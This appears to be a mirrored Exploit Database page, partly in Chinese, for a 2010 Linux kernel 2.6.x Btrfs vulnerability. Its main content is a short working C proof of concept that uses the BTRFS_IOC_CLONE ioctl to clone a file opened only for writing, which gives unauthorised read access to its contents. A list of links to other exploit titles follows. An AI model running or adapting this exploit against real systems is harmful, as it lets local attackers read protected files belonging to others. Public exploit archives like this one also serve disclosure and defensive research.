Linux Kernel 2.6.x – Btrfs Cloned File Security Bypass

Exploit Database
14 阅读

作者： Dan Rosenberg

日期： 2010-05-18
类别：
- local
平台：
- linux
来源：https://www.exploit-db.com/exploits/34001/

/*
source: https://www.securityfocus.com/bid/40241/info

The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation.

An attacker can exploit this issue to clone a file only open for writing. This may allow attackers to obtain sensitive data or launch further attacks. 
*/

#include <fcntl.h>
#include <sys/ioctl.h>
#include <stdio.h>
#include <stdlib.h>

#define BTRFS_IOC_CLONE _IOW(0x94, 9, int)

int main(int argc, char * argv[])
{

if(argc < 3) {
printf("Usage: %s [target] [output]\n", argv[0]);
exit(-1);
}

int output = open(argv[2], O_WRONLY | O_CREAT, 0644);

/* Note - opened for writing, not reading */
int target = open(argv[1], O_WRONLY);

ioctl(output, BTRFS_IOC_CLONE, target);

}

last Exploits
Linux Kernel 2.6.x – Btrfs Cloned File Security Bypass的更多信息

SIPP 3.3 – Stack-Based Buffer Overflow：
Sudo 1.8.25p – ‘pwfeedback’ Buffer Overflow：
Microsoft Windows 10 – Diagnostics Hub Standard Collector Service Privilege Escalation：
Clone2GO Video converter 2.8.2 – Buffer Overflow：
ASAN/SUID – Local Privilege Escalation：
Linux Kernel 4.4.1 – REFCOUNT Overflow Use-After-Free in Keyrings Local Privilege Escalation (1)：
Microsoft SQL Server Management Studio 17.9 – XML External Entity Injection：
BOOTP Turbo 2.0.1214 – ‘BOOTP Turbo’ Unquoted Service Path：